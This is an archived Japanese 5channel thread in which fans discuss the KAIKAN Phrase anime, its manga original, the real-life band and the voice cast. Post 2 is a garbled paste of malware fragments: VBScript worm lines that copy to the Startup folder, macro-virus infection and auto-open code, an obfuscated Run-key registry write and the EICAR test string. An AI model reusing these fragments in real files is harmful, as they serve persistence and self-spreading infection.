5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【キレた】KAIKANフレーズ【天使と悪魔のハーフ】

1 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:24:57 ID:o6ruFc/C0
原作よりはるかに完成度が高く、面白いアニメ版について語ろう。

2 :名無しさん@お腹いっぱい。:2007/02/04(日) 19:28:02 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


3 :名無しさん@お腹いっぱい。:2007/02/05(月) 12:15:27 ID:???O
人気ないなぁ。一応ゴールデンでやってたのにな。

4 :名無しさん@お腹いっぱい。:2007/02/05(月) 17:51:33 ID:???O
途中から深夜に移ったがな

5 :名無しさん@お腹いっぱい。:2007/02/05(月) 22:33:05 ID:???0
アニメは結構面白かったような気がする。
漫画の方は中高生向けなのにレディスコミック張りおエロを前面出して、
且つ、頭の悪い女の妄想をまんま話にしましたってカンジなんだけども
アニメはこのカスみたいな話をよくここまでできたな…と。


6 :名無しさん@お腹いっぱい。:2007/02/11(日) 16:56:11 ID:???O
メンバーの役割教えて…
放送から早8年…再共演する声優さんたちも多いよね

7 :名無しさん@お腹いっぱい。:2007/02/12(月) 02:07:32 ID:???0
アニメは見てた


8 :名無しさん@お腹いっぱい。:2007/02/13(火) 21:36:33 ID:???0
>>5
禿同
自分もアニメスタッフさん、よくここまで頑張ったなって思うよ。
普通アニメ化すると劣化する作品がほとんどだけど、この作品の場合はその逆。
アニメの場合、咲也には裕香の方がお似合いだったかも。

9 :名無しさん@お腹いっぱい。:2007/02/20(火) 19:29:32 ID:???0
ヒロイン出るまでが面白かった
裕香がヒロインのままで良かったのになあ

10 :名無しさん@お腹いっぱい。:2007/02/24(土) 20:59:34 ID:???O
メンバーが揃うまでが面白かった。

11 :名無しさん@お腹いっぱい。:2007/03/21(水) 03:11:31 ID:???0
アニメは若者達の普通のサクセスストーリーだったね
メンバー一人一人に意外とスポット当たってたし燃えた
その後で原作読んだら酷く落胆したのを覚えてる

12 :名無しさん@お腹いっぱい。:2007/03/26(月) 21:25:07 ID:???0
漫画では主人公がヤク漬けにされたり、ヒロインにエロく迫ったりと
アニメの脚本家は困っただろうな。

13 :名無しさん@お腹いっぱい。:2007/04/13(金) 20:49:43 ID:???0
普通に楽しめる青春アニメって感じで好感持てた。
皆キャラ立ちしてたのも凄いと思う。
声優詳しくないけどサンタの喋り方がなんか好きだった。
原作はあえて読んでいない。

しかしTOWAが敦郎に迫るシーン、あれは一体なんだったんだ。

14 :名無しさん@お腹いっぱい。:2007/04/22(日) 07:44:43 ID:???0
原作者は無能だけどアニメスタッフは有能だね

15 :名無しさん@お腹いっぱい。:2007/05/04(金) 23:48:04 ID:S2kHojOu0
ローレライ最高

16 :名無しさん@お腹いっぱい。:2007/05/12(土) 02:55:13 ID:CLPSW7GPO
未だに全話録画したビデオあるんやけど


咲也の歌が上手かったら良かったね
今見ると画作荒れてるけど原作よりはるかに面白い

17 :名無しさん@お腹いっぱい。:2007/05/12(土) 06:10:40 ID:???O
ボーカルの人がおはスタの番長だったような

18 :名無しさん@お腹いっぱい。:2007/05/21(月) 21:52:37 ID:???O
途中から深夜に移動したぐらいしか覚えてない

19 :名無しさん@お腹いっぱい。:2007/06/04(月) 19:23:59 ID:???0
解散したよなー、リアルバンド。
メンバー達は何やってんだろう?


20 :名無しさん@お腹いっぱい。:2007/06/18(月) 07:33:16 ID:IYc0YBKR0
前半はバッサリと愛音をカットして、
バンドが出来上がっていくまでを描いていたのがよかったなー
サクヤが大人の女性と情事とふけったりw、アツロウのねーちゃんがやけにめがっさ可愛かったり
函館ツアーもえがったなぁ 対バンは常道だが燃える!
あ、そうそう みんなで初めてミッドナイトクロウ合せたときは一人でテレビの前で興奮しちゃったよ
しかもライブが終わってトーヤ「バンドっていいものだろう?入らないか」サクヤ「だが断る」
のやりとりで噴出しちまったよ そこはおめーYesと言って盛り上がるとこなのにw

21 :名無しさん@お腹いっぱい。:2007/06/19(火) 00:34:22 ID:???0
原作より愛音が暗くて裕香とくっついてたほうが自然に見えた
少女漫画的な後半よりオリジナルの前半が面白い珍しい珍しいアニメだったけど
当時の原作オタ的にはどうだったんだろ
裕香ウザイとか?


22 :名無しさん@お腹いっぱい。:2007/06/19(火) 07:35:58 ID:???0
>>21
アニメ誌のお便りコーナーで知ったけど
「何で愛音出てこない!?愛音出せゴルァ!!」だったそうですよ
しかも「愛音が出るということは咲夜が幸せになれること」なんてぬかしてたしな、その原作ヲタw

23 :名無しさん@お腹いっぱい。:2007/06/20(水) 16:27:45 ID:???0
>>22
やっぱり真性ヲタっていたんだ

もし今アニメ化するとしたら原作そのままだったのかな
愛音が目だけを見てラルフを咲夜と間違えたり催眠術かけられて拉致られたり
無意味に学園生活が始まったり



24 :名無しさん@通りすがり:2007/06/23(土) 18:33:42 ID:TZliuH4O0
原作もアニメもそうだけどなんか微妙に愛音がうざかった・・・
 つかアニメ版存在薄いし

25 :名無しさん@お腹いっぱい。:2007/06/23(土) 20:48:23 ID:???O
けど少女漫画板ではアニメ版の方が
原作より健気で可愛い所があったという意見もあったよ

26 :名無しさん@お腹いっぱい。:2007/06/24(日) 02:25:48 ID:???O
リアルバンドのボーカルのマコトは元スーパー高校生だろ?




昔雑誌で見た

27 :名無しさん@通りすがり:2007/06/24(日) 15:51:36 ID:WHmo+QXp0
まー確かにそうかもw
 リアルバンドのボーカルのマコト今何してんのかな??

28 :名無しさん@お腹いっぱい。:2007/06/27(水) 01:16:50 ID:Rf9EU+8K0
ホストでもやってんじゃね?

29 :名無しさん@お腹いっぱい。:2007/06/27(水) 02:30:50 ID:???O
声優はドラマCD版の方が豪華だった

30 :富田派:2007/06/27(水) 13:18:44 ID:???0
原作はほんとうにただの過激な少女漫画で芸がないよ。
アニメは世にも珍しいまともな音楽アニメ。恋愛もヒロインも2の次でおもしろかった。
ただこの題材だとネタがなさそうでやっぱすぐ終わった。

リアルリュシュフェルの中の人は、生歌だとあまりにもへたくそすぎてびっくりしたけど、
後期はうまかった

31 :名無しさん@お腹いっぱい。:2007/06/27(水) 13:20:22 ID:???0
>26
高校生のころなにやってたって?

マコトはバンド解散のとき役者に専念する、って記事を読んだがいまはしらない

32 :名無しさん@お腹いっぱい。:2007/06/27(水) 13:21:57 ID:???0
そういえば俺マコトの存在をしらんかったから
松風雅也が両方やってるのかと思ってた、
流石にそこまで万能な男がいたら恐ろしいけどなww

結果としては松風のほうが生き残ってるから不思議w

33 :開発者:2007/06/27(水) 13:26:52 ID:???0
男が見れるのがアニメ、女が嫌いなのがアニメ、だと思う

ただブサメンのヲタはアニメも原作も嫌うとおもう
おれはイケメンなので、あのバンドに憧れすらあった

34 :名無しさん@お腹いっぱい。:2007/06/27(水) 18:03:54 ID:???0
>>33
女を馬鹿にすんな
どっちが作品として価値があるかくらい分かるっての。
原作なんかただのエロ漫画じゃんかw

35 :開発者:2007/06/27(水) 22:45:17 ID:???0
>34
いやおれは女好きですよ アニメ版信者の女って少なそうだったから・・・

36 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:56:13 ID:???0
リアリティのあるストーリーなのに、
貧乏なはずのキャラが高級マンション住まいなのは頂けなかったな

あと雪のダサイポロシャツと、
その上に着るジャケットとか、恐ろしくセンスが悪くて驚いた
初期の臍出してたサクヤのほうがまだましだ

37 :名無しさん@お腹いっぱい。:2007/06/27(水) 22:59:24 ID:???0
サクヤってタクヤを音楽系にしたようなイケメンネームなんだが、
実は俺の祖父が咲也という名前だったから、なんかマヌケだった

あれは老人にもよくある名前だよw

38 :名無しさん@お腹いっぱい。:2007/06/28(木) 00:02:36 ID:???0
>>37
おじいさんで咲也テラカッコヨスw

39 :名無しさん@お腹いっぱい。:2007/06/28(木) 00:21:24 ID:???0
キャラの衣装もおかしかったが作画もたまにおかしかった
原作者が見るのがツライと言ってたが、これだけは同意
ちなみにビデオでは修正されているらしい

美形ばっかだから、崩れると目立つんだよな・・・

40 :hsklt:2007/06/28(木) 00:23:21 ID:???0
アツローの姉さん。

旅立ちの時は大げさに演出されていたのに、
帰ってきたらきたでメンバーが全員冷めているのが妙にリアルで怖い

アニメの後に原作を読むとなんでもかんでも恋愛にされている

41 :名無しさん@お腹いっぱい。:2007/06/28(木) 08:10:32 ID:???0
>37
それあるかもな
「学校へ行こう」で「さくやおじいちゃん」ってのがほんとにいたし

>40
あの姉弟もベタな血がつながってない姉弟だしな・・・

42 :名無しさん@お腹いっぱい。:2007/06/28(木) 09:09:37 ID:???0
原作の「快感フレーズ」はそのまんまセックスのことだけど
こっちはKAIKANと直されていてワラタ

会館でライブやったしKAIKANフレーズかな(作中KAIKANという言葉は出てこなかったし)

43 :名無しさん@お腹いっぱい。:2007/06/28(木) 09:13:20 ID:???0
リアルリュフェルでなんでマコトだけ芸名なの?(最初はsakuyaだったそうだが、なぜかわった?)
他はこのアニメと同名のネームなのに

44 :名無しさん@お腹いっぱい。:2007/06/28(木) 11:25:39 ID:???0
>>39
それでもあの頃の原作者の絵に比べれば
多少崩れてる時でもアニメの方がまだマシだよ
原作の最初の方(つーか結構後まで)読んでみ
もし作者がこれを普通に見れてるならアニメを見るのが辛いなんて
口が裂けても言えんはずだw

45 :名無しさん@お腹いっぱい。:2007/06/28(木) 12:44:48 ID:???0
少女漫画の絵と塗りがCG化されたころのアニメ絵を比べること自体馬鹿

アニメは中盤作画崩れが酷い。原作はハナからあのツラ

46 :名無しさん@お腹いっぱい。:2007/06/28(木) 12:46:33 ID:mNGNnaTg0
作中で歌を披露したバンド、
リュシュフェル、エミュー、などがあるがシュールとかの歌は誰がやってたのあれ
まさか中川じゃあるまいし

47 :名無しさん@お腹いっぱい。:2007/06/28(木) 12:49:24 ID:???0
>45
だよな
アニメcm中、MAKOTOのカットインに使われていたのが
何故か原作の絵で???だったよ

まあぶっちゃけ咲也とはまるで似てないが美形だし
うまくダブルキャストできていたように思う

48 :名無しさん@お腹いっぱい。:2007/06/28(木) 12:58:40 ID:???0
CD買ってたし音楽番組もチェックしてたよ

「うたばん」で原作者が仲居の似顔絵を描いてた

シロウトだけあって生は歌もパフォーマンスも1パターンで下手糞だった・・
ネットで後期の映像を見ると結構うまくなってるなあ

49 :名無しさん@お腹いっぱい。:2007/06/28(木) 13:00:26 ID:???0
>美形ばっかだから、崩れると目立つんだよな・・・
これいえとるw
マスゴミのあんちゃんまで美形だったしなw

不細工なのは咲也を追いかけたパパラッチくらい

50 :名無しさん@お腹いっぱい。:2007/06/28(木) 13:02:04 ID:???0
東京イリュージョンでメンバーの「○○ラーブ」がなんと言ってるか
いまだに聞き取れない


「具志堅LOVE この世界で」としか

51 :名無しさん@お腹いっぱい。:2007/06/28(木) 13:25:41 ID:???0
エミュウはmstで2度見たな


歌詞間違えてたw

52 :名無しさん@お腹いっぱい。:2007/06/28(木) 14:53:55 ID:???0
見てた
顔がでかくて舌を出しすぎのあんちゃん

TMに似てた。ナマはリアル咲也よりうまかった

53 :名無しさん@お腹いっぱい。:2007/06/28(木) 16:54:34 ID:???0
>47

それは少女コミックのCMだったからだな

バイクシーンまで実写で再現しててワロタ(あれはさすがにスタントマンだと思うが)

54 :名無しさん@お腹いっぱい。:2007/06/28(木) 16:55:31 ID:???0
バイクといえば1話でバイクにのった主人公と
メンバーがニアミスするのは地味にかっこいいシーンだったな
こういうベタなのはアニメだけらしいし

55 :名無しさん@お腹いっぱい。:2007/06/28(木) 19:08:42 ID:???0
グレイゴルでサクヤがにやっとするシーンでは
こいつも笑うんだなとなぜか感心した

56 :名無しさん@お腹いっぱい。:2007/06/28(木) 19:33:30 ID:???0
初期のマコトは片目が一重だった気がする

57 :名無しさん@お腹いっぱい。:2007/06/28(木) 23:13:19 ID:???0
マコトってアニメサクヤをイメージした人物であって
原作とは合わなかったな

老けすぎで

58 :名無しさん@お腹いっぱい。:2007/06/29(金) 00:16:53 ID:???0
ペテンシブルー

59 :名無しさん@お腹いっぱい。:2007/06/29(金) 08:04:15 ID:???0
トラックに轢かれた主人公がライブを決行してたけど、
あれは人間じゃないな。
俺は腹を6センチ切っただけでその後瀕死だったし

咲也もチンポにチューブぶちこまれたのかなあ

60 :名無しさん@お腹いっぱい。:2007/06/29(金) 08:52:49 ID:???0
>26

ウィキにも載ってないが、
何してた人なの?

61 :名無しさん@お腹いっぱい。:2007/06/29(金) 12:58:47 ID:???0
サンタってサンタクロースみたいでいじめられそうだ

62 :名無しさん@お腹いっぱい。:2007/06/29(金) 16:17:20 ID:???0
三太なら三男なんだろうか?

63 :名無しさん@お腹いっぱい。:2007/06/29(金) 23:45:28 ID:???0
ソロデビューしたときのメンバーの歌もちゃんとやってほしかったな、
アツローの歌は「まあまあ聴ける」らしいがwwwwwww

64 :名無しさん@お腹いっぱい。:2007/06/29(金) 23:48:12 ID:???0
パイパンフレーズ

65 :名無しさん@お腹いっぱい。:2007/06/30(土) 13:13:17 ID:???0
ギターをミスっただけで演奏をまるまる止めてしまう
リュシュフェルメンバーはシロウトだったな、まるで
こいつら何気に経験浅いからなあ


66 :名無しさん@お腹いっぱい。:2007/06/30(土) 14:48:44 ID:???0
咲也  芭月涼
サン太 蘭帝

のギャップが凄かった

中の人でも蘭帝に負けてるwww

67 :名無しさん@お腹いっぱい。:2007/06/30(土) 18:48:35 ID:???0
松風ってあのころ新人だったんだよな?
緑川とはちがう、また渋いイケメンボイスだと思ってた

68 :名無しさん@お腹いっぱい。:2007/06/30(土) 19:31:45 ID:???0
オレ、最初サクヤの声優が歌も担当してると思ったんで
歌と演技ができて恐ろしい人材だなと思ってたよ

69 :名無しさん@お腹いっぱい。:2007/06/30(土) 22:58:53 ID:???0
グレイは「サバイバル」で紅白出演したんだったな

あの年の紅白ってアニメ主題歌がやたら多かった気がw

70 :名無しさん@お腹いっぱい。:2007/07/01(日) 08:14:28 ID:???0
Cの微熱だけどうにもクソだと思ったら、作曲者が違うんだな

71 :名無しさん@お腹いっぱい。:2007/07/01(日) 12:54:16 ID:???0
なんだこのレインみたいな意味不明なイメージ描写はwwwwwww
そんなゲームなんだか・・・・・
tp://www.youtube.com/watch?v=L0IgyeBmucY

72 :名無しさん@お腹いっぱい。:2007/07/01(日) 13:29:22 ID:???0
初期の咲也は色白で原作咲也をそのまま青年にした感じだったが、
どんどん色黒で泥臭い男になっていったな
絵も最初は少女漫画風だったが、後期は少年漫画っぽい

リアルサクヤはどうかというと、初期の黒髪のころが美形だったが

アニメが終わってからは制約がなくなったせいか髪がめちゃくちゃw

73 :名無しさん@お腹いっぱい。:2007/07/01(日) 13:40:05 ID:???0
初期のMAKOTOって今見ると正統派美形だな

主題歌が堕天使ブルーになったときは「キタ!!!」と思ったものだ、音楽アニメとして

74 :名無しさん@お腹いっぱい。:2007/07/01(日) 16:09:27 ID:???0
アニメが終わったあともバンドあったんだな

てっきり期間限定バンドかと思ってた

75 :名無しさん@お腹いっぱい。:2007/07/01(日) 23:37:25 ID:???0
makotoは歯並び悪かったな 美形だけど

76 :名無しさん@お腹いっぱい。:2007/07/01(日) 23:41:40 ID:???0
ルーシーはなかなかだな

いますぐ聴きたいが寝る

77 :名無しさん@お腹いっぱい。:2007/07/02(月) 09:11:28 ID:i1wh3BzK0
makoto、Mステで東京イリュージョン歌う時
「クソに塗れた 世界は今」と噛んだ

78 :名無しさん@お腹いっぱい。:2007/07/02(月) 14:21:40 ID:XyGf5gF90
敦郎と仲良しになった大阪の姉ちゃん達が良かった。
結局進展は無かったけれど。

79 :名無しさん@お腹いっぱい。:2007/07/02(月) 22:26:55 ID:???0
どんなんだっけ?
原作だと実際の姉ちゃんと恋人になってたなww

80 :名無しさん@お腹いっぱい。:2007/07/02(月) 22:27:52 ID:???0
レンタカーで大阪にいくとき、
トーワが汗で落ちる化粧を必死で噴いていたのが印象深い
ステージ衣装だとただのオカマだしな、あれ

つかギター3人もいらん

81 :名無しさん@お腹いっぱい。:2007/07/02(月) 22:38:52 ID:???0
原作テイストでアニメやったら
あの姉ちゃんたちともセックスしてるだろうなー

82 :名無しさん@お腹いっぱい。:2007/07/03(火) 08:36:53 ID:W0erv3i60
美少年アニメにしては面白かった

深夜に映されてからは打ち切り臭かったが

83 :名無しさん@お腹いっぱい。:2007/07/03(火) 11:20:46 ID:???0
このアニメ、ビデオにはなったけど未だにDVD化はされてないよね。
よくわからんが権利関係とかで難しいのか?

84 :名無しさん@お腹いっぱい。:2007/07/03(火) 18:56:01 ID:W0erv3i60
と思えば少年に当たる人物が一人しかいないことを思い出した

85 :名無しさん@お腹いっぱい。:2007/07/04(水) 07:07:24 ID:vaRE6n810
初期の咲也はハーモニカパフォーマンスがよかったんだが・・・

86 :名無しさん@お腹いっぱい。:2007/07/04(水) 10:11:18 ID:???0
>>84
3人だろ
咲也17、篤朗18、TOWA18

87 :名無しさん@お腹いっぱい。:2007/07/04(水) 13:13:15 ID:???0
最近ようつべでみたけど結構面白いね、このアニメ
このルシフェルってたしか実際のバンドだったと思ったけど今どうしてるんだ?
TVで名前出ないけど、ツアー専門とか海外に出たとか、まさか解散とか

88 :名無しさん@お腹いっぱい。:2007/07/04(水) 19:03:50 ID:???0
>87
とっくに解散してるよ。
ラストアルバムは原作者のしょーもない漫画付きブックレット、
ピクチャーレーベルはセイント星矢みたいに髪型だけ違う5人の漫画絵。

恐らくメンバーにとって、このバンドは黒歴史だと思う。


89 :名無しさん@お腹いっぱい。:2007/07/04(水) 20:00:58 ID:???0
>86

それアニメ版の話か?ww


うっそ、俺アニメサクヤは25くらいかと思ってたがww

原作を読んだらサクヤが高校生で驚いた
アニメは中学もいってなさそうだもの

90 :名無しさん@お腹いっぱい。:2007/07/04(水) 20:20:12 ID:???0
>>89
ちゃんとアニメ設定だよ
高1で家出してそれ以来帰ってないのに
特にバイトしてる様子もないTOWAがあんな立派なマンションに
住んでたりするけど、18歳って設定なんだ。

91 :名無しさん@お腹いっぱい。:2007/07/04(水) 20:38:24 ID:???0
>>88
情報サンクス、そっか解散してたか

92 :名無しさん@お腹いっぱい。:2007/07/04(水) 20:54:50 ID:???0
>90
マジかw
放送終了後から、今になって知ったww
じゃあサクヤと愛音は年齢殆ど変わらないな

まあたしかに、25歳でデビューというのは遅咲きすぎるな

93 :名無しさん@お腹いっぱい。:2007/07/04(水) 21:00:03 ID:???0
>88

アニメが放送していた頃は、苦難のなかで
そこそこ楽しんでやっているようにも見えた

94 :名無しさん@お腹いっぱい。:2007/07/04(水) 21:01:25 ID:???0
sakuya yuki atsuro はわかるが、あとのやつらは模倣すらしてなかったな

95 :名無しさん@お腹いっぱい。:2007/07/04(水) 22:21:42 ID:???0
未成年に飲酒させてなかったか?グレイゴルwwwwwwwwwwwwwww

96 :名無しさん@お腹いっぱい。:2007/07/04(水) 22:32:15 ID:???0
咲也 23
サン太 21
アツロウ 17
雪 25
TO-WA 23

くらいに見てたwww

97 :名無しさん@お腹いっぱい。:2007/07/04(水) 22:35:35 ID:???0
>71
それって、アニメ版のゲーム化なのに
何故かタイトルが「快感フレーズ」なんだな

ファミ通レビュアーが咲也はいい男だなーとほめてた

98 :名無しさん@お腹いっぱい。:2007/07/04(水) 22:57:27 ID:???0
じゃあやっぱ美少年アニメか
 美青年アニメだと思ってた

99 :名無しさん@お腹いっぱい。:2007/07/04(水) 23:29:12 ID:???0
>>95
「クレイドル」だよ

100 :名無しさん@お腹いっぱい。:2007/07/04(水) 23:38:14 ID:???0
そうそう、そのグレイザルなんですけどwwwwwwww


まあどっちでもいいだろ。飲酒シーンなかったっけ?

101 :名無しさん@お腹いっぱい。:2007/07/04(水) 23:40:04 ID:???0
トーワの収入源は謎

まあイケメンバンドがボロアパートに住んでるのがカコワルイだけかもしれんが

102 :名無しさん@お腹いっぱい。:2007/07/04(水) 23:44:34 ID:???0
バイクに跨る愛音はリアルな動作だな

103 :名無しさん@お腹いっぱい。:2007/07/05(木) 00:02:16 ID:???0
世間に飽きられるリュシュフェルはちょっと極端な描写だったなあ

104 :名無しさん@お腹いっぱい。:2007/07/05(木) 00:09:08 ID:uZDX51Ki0
アルバム買ったむかし

105 :名無しさん@お腹いっぱい。:2007/07/05(木) 13:06:33 ID:???0
>>101
TOWAに理解のある叔父さんあたりがパトロンになって
くれてたのかも。メジャーデビューまでの期限付きとかで。
何かTOWAのバイト姿は想像できんし。

106 :名無しさん@お腹いっぱい。:2007/07/05(木) 17:18:01 ID:???0
どんな叔父さんだよww


あいつも今見るとニートに近いな。

107 :名無しさん@お腹いっぱい。:2007/07/05(木) 20:34:57 ID:???0
サン太が一番リアルなキャラだったな
なんか格好もみすぼらしいし

108 :名無しさん@お腹いっぱい。:2007/07/05(木) 22:53:07 ID:???0
すね毛出してるしな

109 :名無しさん@お腹いっぱい。:2007/07/05(木) 23:47:48 ID:???0
>>106
多分金持ちで道楽者(もしくは音楽好き)
親戚からは変わり者扱いされてるような

110 :名無しさん@お腹いっぱい。:2007/07/06(金) 06:41:43 ID:YSisW86b0
それは妄想として?

111 :名無しさん@お腹いっぱい。:2007/07/06(金) 08:43:45 ID:???0
「お前の、次の夢は何だ?」


先生カスキャラなのに何気に名言っぽいことを・・・

112 :名無しさん@お腹いっぱい。:2007/07/06(金) 09:14:06 ID:???0
towa普段から化粧してるからなあ

113 :名無しさん@お腹いっぱい。:2007/07/06(金) 22:34:33 ID:???0
サクヤのボーカルがそこまでうまいとは思わなかったから
劇中のセリフも説得力に欠けてた

114 :名無しさん@お腹いっぱい。:2007/07/06(金) 23:20:49 ID:???0
>113
はぁそうですか

115 :名無しさん@お腹いっぱい。:2007/07/06(金) 23:54:58 ID:???0
そうですよ

はっきりいって下手糞

116 :名無しさん@お腹いっぱい。:2007/07/06(金) 23:56:31 ID:YSisW86b0
リアルsakuyaは下手糞のうえにガチガチだから、かなり聴いていられなかったw

117 :名無しさん@お腹いっぱい。:2007/07/07(土) 00:03:45 ID:???0
原作はエロマンガだかクソマンガだかギャグマンガだかわからない・・・
よくネタにされてるね
漫画は音楽2恋愛8、アニメは音楽8恋愛2くらいだった
実際恋愛描写があるのはメンバーでも2人だけだし

118 :名無しさん@お腹いっぱい。:2007/07/07(土) 00:05:49 ID:???0
原作では糞電波の愛音も、
アニメでヒロインになってしまえば普通の女子高生だったなww

119 :名無しさん@お腹いっぱい。:2007/07/07(土) 00:10:13 ID:???0
キスしただけで浮遊状態だからなあ

アニメだと愛音が女子高生だとやけに強調されてるから
バンドメンバーはアツロー以外全員20代前半くらいかと思っていたんだが

120 :名無しさん@お腹いっぱい。:2007/07/07(土) 00:14:51 ID:Lny4soG90
このアニメで一番面白いのは、
ルパードの下手糞な日本語

「サークーヤァカぁ」とか

121 :名無しさん@お腹いっぱい。:2007/07/07(土) 07:22:40 ID:???0
>>115
俺も下手だと思ってた・・
ロックはともかく、ピアノの弾き語り? は・・

最初にグレイなんか持って来たのがマズかったな

122 :名無しさん@お腹いっぱい。:2007/07/07(土) 08:08:03 ID:???0
アニメサクヤの恥ずかしいプレイって
通りでキスしたくらいか

なんか普通の人だったね

原作の変態は全員普通の人になってたから刺激が無いが、俺はアニメのほうが好き

123 :名無しさん@お腹いっぱい。:2007/07/07(土) 08:35:21 ID:???0
原作とアニメ、それぞれ気づいたら終わってた

誰か最終回の解説を頼む

124 :名無しさん@お腹いっぱい。:2007/07/07(土) 12:39:58 ID:???0
アニメはイギリスに行った
原作は知らん

125 :名無しさん@お腹いっぱい。:2007/07/07(土) 13:25:53 ID:???0
海パンフレーズ

126 :名無しさん@お腹いっぱい。:2007/07/07(土) 22:25:32 ID:???0
原作はサクヤとアイネが別れるところまでしか知らないな

「俺たちの夢といってくれて、うれしかった」のあたり

127 :名無しさん@お腹いっぱい。:2007/07/09(月) 00:00:02 ID:???0
原作は快姦フレーズ

128 :名無しさん@お腹いっぱい。:2007/07/10(火) 21:01:33 ID:???0
山田君、>>127さんに座布団一枚やんなさい

129 :名無しさん@お腹いっぱい。:2007/07/12(木) 19:34:13 ID:BRiWmJmO0
アニメ版は改竄フレーズ

130 :名無しさん@お腹いっぱい。:2007/07/13(金) 00:45:17 ID:???0
作者がアニメに KANKANフレーズ

131 :名無しさん@お腹いっぱい。:2007/08/05(日) 11:01:00 ID:???0


132 :名無しさん@お腹いっぱい。:2007/08/09(木) 14:44:23 ID:???O
なんで人気無かったんだろう?あんまり無いアニメだよね。けうゆうアニメ。

133 :名無しさん@お腹いっぱい。:2007/08/09(木) 17:42:02 ID:???O
けうゆう×
こうゆう○

134 :名無しさん@お腹いっぱい。:2007/08/10(金) 21:43:32 ID:???O
すみません、いつも
KANIKAN☆フレーク
を思い出してしまいます。

135 :名無しさん@お腹いっぱい。:2007/08/11(土) 22:08:55 ID:???0
山田くん、>>134さんに座布団1枚やって

136 :名無しさん@お腹いっぱい。:2007/08/13(月) 02:35:13 ID:2AlGxnkG0
バンドがメジャーで売れて、収入は大幅にうpしただろうに
誰一人として引っ越さないのな(雪は除く)

もっと警備が厳重な所に引っ越さないと危険なんジャマイカ?

137 :名無しさん@お腹いっぱい。:2007/08/14(火) 21:33:13 ID:???0
>>131
黙るなよ、馬鹿

138 :名無しさん@お腹いっぱい。:2007/08/14(火) 21:35:01 ID:???0
>>136
最初から全員、何故かいい部屋に住んでるんだから引っ越さなくても良いだろ
to-waの収入源は謎

一番得をしちゃったのはアツローパパだな

139 :名無しさん@お腹いっぱい。:2007/08/14(火) 22:22:39 ID:???0
息子とその友達が暴力事件起こしたのに、メシまで奢ろうとしているパパは必死すぎて泣けた

140 :名無しさん@お腹いっぱい。:2007/08/15(水) 21:33:16 ID:kRNuR7hK0
>>136は一瞬リアルシュフェルのことかと思ったwwwwwwwwwww

そういやアニメだとバンド名が違ったね
リアルバンドはアニメと同じ名前

そういう意味じゃ同じ歌を歌ってもアニメに忠実だった

141 :名無しさん@お腹いっぱい。:2007/08/16(木) 00:09:08 ID:???0
パイパンフレーズ

142 :名無しさん@お腹いっぱい。:2007/08/18(土) 06:53:31 ID:Ni1RY3Gt0
腐アニメのようで男くさい内容がよかったね

唯一腐臭いのがアツローにキスしようとするto-waくらい

143 :富田派:2007/08/18(土) 23:52:27 ID:???0
「山に登りきったら、次は俺は空を目指す」




正直いい男にしかはけない名言

144 :名無しさん@お腹いっぱい。:2007/08/20(月) 23:25:34 ID:???0
怪談フレーズ

145 :名無しさん@お腹いっぱい。:2007/09/20(木) 16:47:29 ID:???0
ATSUROって今平野綾としょこたんのバックで弾いてるんだな

146 :名無しさん@お腹いっぱい。:2007/09/21(金) 21:43:31 ID:???0
音楽に国境はありません。

だがそこには高い高い壁があるのです



これかな名言といえば
いかにも外人がいいそうだ

147 :名無しさん@お腹いっぱい。:2007/09/22(土) 09:15:11 ID:???0
主人公の歌がさほどうまくないからメンバーが必死になる動機も薄かったな
もっと上手い人使えよ
まあルックス、サクヤっぽさ、ボーカル力、タレント性などなどかねそろえたやつはそうはいないだろうが

148 :名無しさん@お腹いっぱい。:2007/09/26(水) 00:16:35 ID:???0
あの親父見てるとサクヤも将来禿げそうでわろす 親父の若い頃見たいな

149 :名無しさん@お腹いっぱい。:2007/09/28(金) 17:02:04 ID:???0
原作者は実写ならサクヤはガクトっていってたな

150 :名無しさん@お腹いっぱい。:2007/09/29(土) 00:09:08 ID:???0
いつ?ぜんぜん違うじゃん

すげえセンス…

151 :名無しさん@お腹いっぱい。:2007/09/29(土) 02:29:30 ID:???0
>>150
コミックスの何巻かで作者が答えてた
他のメンバーも当てはめてたけどそっちは忘れた
確か2000年頃に読んだと思う

152 :名無しさん@お腹いっぱい。:2007/10/10(水) 12:29:06 ID:???0
これ、弟がはまってた
今は脱オタしているが道を踏み外すのではないかと心配したものだ

153 :名無しさん@お腹いっぱい。:2007/10/31(水) 16:25:42 ID:9sq/7IraO
不倫妻とTOWAが似てる件

154 :名無しさん@お腹いっぱい。:2007/11/01(木) 07:25:09 ID:???0
http://www.biggym.co.jp/store/video/work/atomic_chab/achub_006_y3.jpg

155 :名無しさん@お腹いっぱい。:2007/11/01(木) 09:40:25 ID:???0
>>153
髪型とかね。
顔も似てるというか、TOWAは不倫妻の顔をもっとやわらかくした感じ

156 :名無しさん@お腹いっぱい。:2008/02/04(月) 17:17:00 ID:???O

コンテストまでは面白かった

157 :名無しさん@お腹いっぱい。:2008/03/12(水) 18:33:00 ID:JP1yPZdH0
KAIKANフレーズ アニメ動画全話UPしたんで暇な時にでもどうぞ〜
全話無料で見れます。
http://blog.livedoor.jp/yosh007/

158 :名無しさん@お腹いっぱい。:2008/03/12(水) 18:37:34 ID:???0
>>1

確かにキザで笑えるアニメだったな

